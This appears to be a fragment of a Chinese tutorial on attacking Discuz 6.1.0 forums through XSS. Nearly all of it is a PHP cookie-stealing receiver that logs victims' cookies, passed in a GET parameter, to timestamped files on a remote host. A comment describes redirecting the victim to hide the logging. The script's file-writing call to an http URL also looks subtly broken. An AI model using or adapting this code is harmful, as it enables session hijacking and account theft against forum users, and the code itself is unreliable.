利用XSS渗透DISCUZ 6.1.0实战

  ************************************************************************************

  <?php

  if (isset($_GET['var'])) {

  file_put_contents('http://www.jb51.net/hack/cookie/'.time().'.txt', urldecode($_GET['var']));

  }

  ?>

   //转移页面隐蔽上面记录cookie的操作

  ************************************************************************************